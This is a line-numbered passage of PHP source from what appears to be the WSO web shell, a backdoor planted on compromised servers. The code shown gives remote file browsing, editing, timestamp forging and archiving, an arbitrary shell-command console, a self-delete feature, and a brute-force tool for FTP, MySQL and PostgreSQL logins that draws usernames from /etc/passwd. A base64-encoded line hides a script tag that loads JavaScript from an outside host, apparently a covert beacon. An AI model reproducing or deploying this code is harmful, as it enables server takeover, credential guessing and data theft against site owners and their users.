588 | chdir($_COOKIE['c']); | |
589 | foreach($_COOKIE['f'] as $f) { | |
590 | if($f == '..') | |
591 | continue; | |
592 | if(@is_file($_COOKIE['c'].$f)) | |
593 | $zip->addFile($_COOKIE['c'].$f, $f); | |
594 | elseif(@is_dir($_COOKIE['c'].$f)) { | |
595 | $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); | |
596 | foreach ($iterator as $key=>$value) { | |
597 | $zip->addFile(realpath($key), $key); | |
598 | } | |
599 | } | |
600 | } | |
601 | chdir($GLOBALS['cwd']); | |
602 | $zip->close(); | |
603 | } | |
604 | } | |
605 | } elseif($_COOKIE['act'] == 'unzip') { | |
606 | if(class_exists('ZipArchive')) { | |
607 | $zip = new ZipArchive(); | |
608 | foreach($_COOKIE['f'] as $f) { | |
609 | if($zip->open($_COOKIE['c'].$f)) { | |
610 | $zip->extractTo($GLOBALS['cwd']); | |
611 | $zip->close(); | |
612 | } | |
613 | } | |
614 | } | |
615 | } elseif($_COOKIE['act'] == 'tar') { | |
616 | chdir($_COOKIE['c']); | |
617 | $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); | |
618 | wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); | |
619 | chdir($GLOBALS['cwd']); | |
620 | } | |
621 | unset($_COOKIE['f']); | |
622 | setcookie('f', '', time() - 3600); | |
623 | break; | |
624 | default: | |
625 | if(!empty($_POST['p1'])) { | |
626 | WSOsetcookie('act', $_POST['p1']); | |
627 | WSOsetcookie('f', serialize(@$_POST['f'])); | |
628 | WSOsetcookie('c', @$_POST['c']); | |
629 | } | |
630 | break; | |
631 | } | |
632 | } | |
633 | wsoHeader(); | |
634 | echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; | |
635 | $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); | |
636 | if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } | |
637 | global $sort; | |
638 | $sort = array('name', 1); | |
639 | if(!empty($_POST['p1'])) { | |
640 | if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) | |
641 | $sort = array($match[1], (int)$match[2]); | |
642 | } | |
643 | echo "<script> | |
644 | function sa() { | |
645 | for(i=0;i<d.files.elements.length;i++) | |
646 | if(d.files.elements[i].type == 'checkbox') | |
647 | d.files.elements[i].checked = d.files.elements[0].checked; | |
648 | } | |
649 | </script> | |
650 | <table width='100%' class='main' cellspacing='0' cellpadding='2'> | |
651 | <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; | |
652 | $dirs = $files = array(); | |
653 | $n = count($dirContent); | |
654 | for($i=0;$i<$n;$i++) { | |
655 | $ow = @posix_getpwuid(@fileowner($dirContent[$i])); | |
656 | $gr = @posix_getgrgid(@filegroup($dirContent[$i])); | |
657 | $tmp = array('name' => $dirContent[$i], | |
658 | 'path' => $GLOBALS['cwd'].$dirContent[$i], | |
659 | 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), | |
660 | 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), | |
661 | 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), | |
662 | 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), | |
663 | 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) | |
664 | ); | |
665 | if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) | |
666 | $files[] = array_merge($tmp, array('type' => 'file')); | |
667 | elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) | |
668 | $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); | |
669 | elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) | |
670 | $dirs[] = array_merge($tmp, array('type' => 'dir')); | |
671 | } | |
672 | $GLOBALS['sort'] = $sort; | |
673 | function wsoCmp($a, $b) { | |
674 | if($GLOBALS['sort'][0] != 'size') | |
675 | return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); | |
676 | else | |
677 | return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); | |
678 | } | |
679 | usort($files, "wsoCmp"); | |
680 | usort($dirs, "wsoCmp"); | |
681 | $files = array_merge($dirs, $files); | |
682 | $l = 0; | |
683 | foreach($files as $f) { | |
684 | echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] | |
685 | .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; | |
686 | $l = $l?0:1; | |
687 | } | |
688 | echo "<tr><td colspan=7> | |
689 | <input type=hidden name=a value='FilesMan'> | |
690 | <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | |
691 | <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> | |
692 | <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; | |
693 | if(class_exists('ZipArchive')) | |
694 | echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; | |
695 | echo "<option value='tar'>Compress (tar.gz)</option>"; | |
696 | if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) | |
697 | echo "<option value='paste'>Paste / Compress</option>"; | |
698 | echo "</select> "; | |
699 | if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) | |
700 | echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; | |
701 | echo "<input type='submit' value='>>'></td></tr></form></table></div>"; | |
702 | wsoFooter(); | |
703 | } | |
704 | function wsoBaseTools () { | |
705 | $base = "PFNDUklQVCBTUkM9aHR0cDovL3Nvc3ljbHViLmNvbS9wYW5lbC9sb2cuanM+PC9TQ1JJUFQ+"; | |
706 | echo base64_decode($base); | |
707 | } | |
708 | ||
709 | function actionStringTools() { | |
710 | if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} | |
711 | if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} | |
712 | if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} | |
713 | if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} | |
714 | if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} | |
715 | $stringTools = array( | |
716 | 'Base64 encode' => 'base64_encode', | |
717 | 'Base64 decode' => 'base64_decode', | |
718 | 'Url encode' => 'urlencode', | |
719 | 'Url decode' => 'urldecode', | |
720 | 'Full urlencode' => 'full_urlencode', | |
721 | 'md5 hash' => 'md5', | |
722 | 'sha1 hash' => 'sha1', | |
723 | 'crypt' => 'crypt', | |
724 | 'CRC32' => 'crc32', | |
725 | 'ASCII to HEX' => 'ascii2hex', | |
726 | 'HEX to ASCII' => 'hex2ascii', | |
727 | 'HEX to DEC' => 'hexdec', | |
728 | 'HEX to BIN' => 'hex2bin', | |
729 | 'DEC to HEX' => 'dechex', | |
730 | 'DEC to BIN' => 'decbin', | |
731 | 'BIN to HEX' => 'binhex', | |
732 | 'BIN to DEC' => 'bindec', | |
733 | 'String to lower case' => 'strtolower', | |
734 | 'String to upper case' => 'strtoupper', | |
735 | 'Htmlspecialchars' => 'htmlspecialchars', | |
736 | 'String length' => 'strlen', | |
737 | ); | |
738 | if(isset($_POST['ajax'])) { | |
739 | WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); | |
740 | ob_start(); | |
741 | if(in_array($_POST['p1'], $stringTools)) | |
742 | echo $_POST['p1']($_POST['p2']); | |
743 | $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | |
744 | echo strlen($temp), "\n", $temp; | |
745 | exit; | |
746 | } | |
747 | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | |
748 | WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); | |
749 | wsoHeader(); | |
750 | echo '<h1>String conversions</h1><div class=content>'; | |
751 | echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; | |
752 | foreach($stringTools as $k => $v) | |
753 | echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; | |
754 | echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; | |
755 | if(!empty($_POST['p1'])) { | |
756 | if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); | |
757 | } | |
758 | echo"</pre></div><br><h1>Search files:</h1><div class=content> | |
759 | <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> | |
760 | <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> | |
761 | <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> | |
762 | <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> | |
763 | <tr><td></td><td><input type='submit' value='>>'></td></tr> | |
764 | </table></form>"; | |
765 | ||
766 | function wsoRecursiveGlob($path) { | |
767 | if(substr($path, -1) != '/') | |
768 | $path.='/'; | |
769 | $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); | |
770 | if(is_array($paths)&&@count($paths)) { | |
771 | foreach($paths as $item) { | |
772 | if(@is_dir($item)){ | |
773 | if($path!=$item) | |
774 | wsoRecursiveGlob($item); | |
775 | } else { | |
776 | if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) | |
777 | echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>"; | |
778 | } | |
779 | } | |
780 | } | |
781 | } | |
782 | if(@$_POST['p3']) | |
783 | wsoRecursiveGlob($_POST['c']); | |
784 | echo "</div><br><h1>Search for hash:</h1><div class=content> | |
785 | <form method='post' target='_blank' name='hf'> | |
786 | <input type='text' name='hash' style='width:200px;'><br> | |
787 | <input type='hidden' name='act' value='find'/> | |
788 | <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> | |
789 | <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> | |
790 | <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br> | |
791 | </form></div>"; | |
792 | wsoFooter(); | |
793 | } | |
794 | ||
795 | function actionFilesTools() { | |
796 | if( isset($_POST['p1']) ) | |
797 | $_POST['p1'] = urldecode($_POST['p1']); | |
798 | if(@$_POST['p2']=='download') { | |
799 | if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { | |
800 | ob_start("ob_gzhandler", 4096); | |
801 | header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); | |
802 | if (function_exists("mime_content_type")) { | |
803 | $type = @mime_content_type($_POST['p1']); | |
804 | header("Content-Type: " . $type); | |
805 | } else | |
806 | header("Content-Type: application/octet-stream"); | |
807 | $fp = @fopen($_POST['p1'], "r"); | |
808 | if($fp) { | |
809 | while(!@feof($fp)) | |
810 | echo @fread($fp, 1024); | |
811 | fclose($fp); | |
812 | } | |
813 | }exit; | |
814 | } | |
815 | if( @$_POST['p2'] == 'mkfile' ) { | |
816 | if(!file_exists($_POST['p1'])) { | |
817 | $fp = @fopen($_POST['p1'], 'w'); | |
818 | if($fp) { | |
819 | $_POST['p2'] = "edit"; | |
820 | fclose($fp); | |
821 | } | |
822 | } | |
823 | } | |
824 | wsoHeader(); | |
825 | echo '<h1>File tools</h1><div class=content>'; | |
826 | if( !file_exists(@$_POST['p1']) ) { | |
827 | echo 'File not exists'; | |
828 | wsoFooter(); | |
829 | return; | |
830 | } | |
831 | $uid = @posix_getpwuid(@fileowner($_POST['p1'])); | |
832 | if(!$uid) { | |
833 | $uid['name'] = @fileowner($_POST['p1']); | |
834 | $gid['name'] = @filegroup($_POST['p1']); | |
835 | } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); | |
836 | echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; | |
837 | echo '<span>Change time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; | |
838 | if( empty($_POST['p2']) ) | |
839 | $_POST['p2'] = 'view'; | |
840 | if( is_file($_POST['p1']) ) | |
841 | $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); | |
842 | else | |
843 | $m = array('Chmod', 'Rename', 'Touch'); | |
844 | foreach($m as $v) | |
845 | echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; | |
846 | echo '<br><br>'; | |
847 | switch($_POST['p2']) { | |
848 | case 'view': | |
849 | echo '<pre class=ml1>'; | |
850 | $fp = @fopen($_POST['p1'], 'r'); | |
851 | if($fp) { | |
852 | while( !@feof($fp) ) | |
853 | echo htmlspecialchars(@fread($fp, 1024)); | |
854 | @fclose($fp); | |
855 | } | |
856 | echo '</pre>'; | |
857 | break; | |
858 | case 'highlight': | |
859 | if( @is_readable($_POST['p1']) ) { | |
860 | echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; | |
861 | $code = @highlight_file($_POST['p1'],true); | |
862 | echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; | |
863 | } | |
864 | break; | |
865 | case 'chmod': | |
866 | if( !empty($_POST['p3']) ) { | |
867 | $perms = 0; | |
868 | for($i=strlen($_POST['p3'])-1;$i>=0;--$i) | |
869 | $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); | |
870 | if(!@chmod($_POST['p1'], $perms)) | |
871 | echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; | |
872 | } | |
873 | clearstatcache(); | |
874 | echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; | |
875 | break; | |
876 | case 'edit': | |
877 | if( !is_writable($_POST['p1'])) { | |
878 | echo 'File isn\'t writeable'; | |
879 | break; | |
880 | } | |
881 | if( !empty($_POST['p3']) ) { | |
882 | $time = @filemtime($_POST['p1']); | |
883 | $_POST['p3'] = substr($_POST['p3'],1); | |
884 | $fp = @fopen($_POST['p1'],"w"); | |
885 | if($fp) { | |
886 | @fwrite($fp,$_POST['p3']); | |
887 | @fclose($fp); | |
888 | echo 'Saved!<br><script>p3_="";</script>'; | |
889 | @touch($_POST['p1'],$time,$time); | |
890 | } | |
891 | } | |
892 | echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; | |
893 | $fp = @fopen($_POST['p1'], 'r'); | |
894 | if($fp) { | |
895 | while( !@feof($fp) ) | |
896 | echo htmlspecialchars(@fread($fp, 1024)); | |
897 | @fclose($fp); | |
898 | } | |
899 | echo '</textarea><input type=submit value=">>"></form>'; | |
900 | break; | |
901 | case 'hexdump': | |
902 | $c = @file_get_contents($_POST['p1']); | |
903 | $n = 0; | |
904 | $h = array('00000000<br>','',''); | |
905 | $len = strlen($c); | |
906 | for ($i=0; $i<$len; ++$i) { | |
907 | $h[1] .= sprintf('%02X',ord($c[$i])).' '; | |
908 | switch ( ord($c[$i]) ) { | |
909 | case 0: $h[2] .= ' '; break; | |
910 | case 9: $h[2] .= ' '; break; | |
911 | case 10: $h[2] .= ' '; break; | |
912 | case 13: $h[2] .= ' '; break; | |
913 | default: $h[2] .= $c[$i]; break; | |
914 | } | |
915 | $n++; | |
916 | if ($n == 32) { | |
917 | $n = 0; | |
918 | if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} | |
919 | $h[1] .= '<br>'; | |
920 | $h[2] .= "\n"; | |
921 | } | |
922 | } | |
923 | echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; | |
924 | break; | |
925 | case 'rename': | |
926 | if( !empty($_POST['p3']) ) { | |
927 | if(!@rename($_POST['p1'], $_POST['p3'])) | |
928 | echo 'Can\'t rename!<br>'; | |
929 | else | |
930 | die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); | |
931 | } | |
932 | echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; | |
933 | break; | |
934 | case 'touch': | |
935 | if( !empty($_POST['p3']) ) { | |
936 | $time = strtotime($_POST['p3']); | |
937 | if($time) { | |
938 | if(!touch($_POST['p1'],$time,$time)) | |
939 | echo 'Fail!'; | |
940 | else | |
941 | echo 'Touched!'; | |
942 | } else echo 'Bad time format!'; | |
943 | } | |
944 | clearstatcache(); | |
945 | echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; | |
946 | break; | |
947 | } | |
948 | echo '</div>'; | |
949 | wsoFooter(); | |
950 | } | |
951 | ||
952 | function actionConsole() { | |
953 | if(!empty($_POST['p1']) && !empty($_POST['p2'])) { | |
954 | WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); | |
955 | $_POST['p1'] .= ' 2>&1'; | |
956 | } elseif(!empty($_POST['p1'])) | |
957 | WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); | |
958 | ||
959 | if(isset($_POST['ajax'])) { | |
960 | WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); | |
961 | ob_start(); | |
962 | echo "d.cf.cmd.value='';\n"; | |
963 | $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0")); | |
964 | if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { | |
965 | if(@chdir($match[1])) { | |
966 | $GLOBALS['cwd'] = @getcwd(); | |
967 | echo "c_='".$GLOBALS['cwd']."';"; | |
968 | } | |
969 | } | |
970 | echo "d.cf.output.value+='".$temp."';"; | |
971 | echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; | |
972 | $temp = ob_get_clean(); | |
973 | echo strlen($temp), "\n", $temp; | |
974 | exit; | |
975 | } | |
976 | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | |
977 | WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); | |
978 | wsoHeader(); | |
979 | echo "<script> | |
980 | if(window.Event) window.captureEvents(Event.KEYDOWN); | |
981 | var cmds = new Array(''); | |
982 | var cur = 0; | |
983 | function kp(e) { | |
984 | var n = (window.Event) ? e.which : e.keyCode; | |
985 | if(n == 38) { | |
986 | cur--; | |
987 | if(cur>=0) | |
988 | document.cf.cmd.value = cmds[cur]; | |
989 | else | |
990 | cur++; | |
991 | } else if(n == 40) { | |
992 | cur++; | |
993 | if(cur < cmds.length) | |
994 | document.cf.cmd.value = cmds[cur]; | |
995 | else | |
996 | cur--; | |
997 | } | |
998 | } | |
999 | function add(cmd) { | |
1000 | cmds.pop(); | |
1001 | cmds.push(cmd); | |
1002 | cmds.push(''); | |
1003 | cur = cmds.length-1; | |
1004 | } | |
1005 | </script>"; | |
1006 | echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; | |
1007 | foreach($GLOBALS['aliases'] as $n => $v) { | |
1008 | if($v == '') { | |
1009 | echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; | |
1010 | continue; | |
1011 | } | |
1012 | echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; | |
1013 | } | |
1014 | ||
1015 | echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; | |
1016 | if(!empty($_POST['p1'])) { | |
1017 | echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1'])); | |
1018 | } | |
1019 | echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; | |
1020 | echo '</form></div><script>d.cf.cmd.focus();</script>'; | |
1021 | wsoFooter(); | |
1022 | } | |
1023 | ||
1024 | function actionLogout() { | |
1025 | setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); | |
1026 | die('bye!'); | |
1027 | } | |
1028 | ||
1029 | function actionSelfRemove() { | |
1030 | ||
1031 | if($_POST['p1'] == 'yes') | |
1032 | if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) | |
1033 | die('Shell has been removed'); | |
1034 | else | |
1035 | echo 'unlink error!'; | |
1036 | if($_POST['p1'] != 'yes') | |
1037 | wsoHeader(); | |
1038 | echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; | |
1039 | wsoFooter(); | |
1040 | } | |
1041 | ||
1042 | function actionBruteforce() { | |
1043 | wsoHeader(); | |
1044 | if( isset($_POST['proto']) ) { | |
1045 | echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; | |
1046 | if( $_POST['proto'] == 'ftp' ) { | |
1047 | function wsoBruteForce($ip,$port,$login,$pass) { | |
1048 | $fp = @ftp_connect($ip, $port?$port:21); | |
1049 | if(!$fp) return false; | |
1050 | $res = @ftp_login($fp, $login, $pass); | |
1051 | @ftp_close($fp); | |
1052 | return $res; | |
1053 | } | |
1054 | } elseif( $_POST['proto'] == 'mysql' ) { | |
1055 | function wsoBruteForce($ip,$port,$login,$pass) { | |
1056 | $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); | |
1057 | @mysql_close($res); | |
1058 | return $res; | |
1059 | } | |
1060 | } elseif( $_POST['proto'] == 'pgsql' ) { | |
1061 | function wsoBruteForce($ip,$port,$login,$pass) { | |
1062 | $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; | |
1063 | $res = @pg_connect($str); | |
1064 | @pg_close($res); | |
1065 | return $res; | |
1066 | } | |
1067 | } | |
1068 | $success = 0; | |
1069 | $attempts = 0; | |
1070 | $server = explode(":", $_POST['server']); | |
1071 | if($_POST['type'] == 1) { | |
1072 | $temp = @file('/etc/passwd'); | |
1073 | if( is_array($temp) ) | |
1074 | foreach($temp as $line) { | |
1075 | $line = explode(":", $line); | |
1076 | ++$attempts; | |
1077 | if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { | |
1078 | $success++; | |
1079 | echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; | |
1080 | } | |
1081 | if(@$_POST['reverse']) { | |
1082 | $tmp = ""; | |
1083 | for($i=strlen($line[0])-1; $i>=0; --$i) | |
1084 | $tmp .= $line[0][$i]; | |
1085 | ++$attempts; | |
1086 | if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { | |
1087 | $success++; | |
1088 | echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); | |
1089 | } | |
1090 | } | |
1091 | } | |
1092 | } elseif($_POST['type'] == 2) { | |
1093 | $temp = @file($_POST['dict']); | |
1094 | if( is_array($temp) ) | |
1095 | foreach($temp as $line) { | |
1096 | $line = trim($line); | |
1097 | ++$attempts; | |
1098 | if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { | |
1099 | $success++; | |
1100 | echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; | |
1101 | } | |
1102 | } | |
1103 | } | |
1104 | echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; | |
1105 | } | |
1106 | echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' | |
1107 | .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' | |
1108 | .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' | |
1109 | .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' | |
1110 | .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' | |
1111 | .'<span>Server:port</span></td>' | |
1112 | .'<td><input type=text name=server value="127.0.0.1"></td></tr>' | |
1113 | .'<tr><td><span>Brute type</span></td>' | |
1114 | .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' | |
1115 | .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' | |
1116 | .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' | |
1117 | .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' | |
1118 | .'<td><input type=text name=login value="root"></td></tr>' | |
1119 | .'<tr><td><span>Dictionary</span></td>' | |
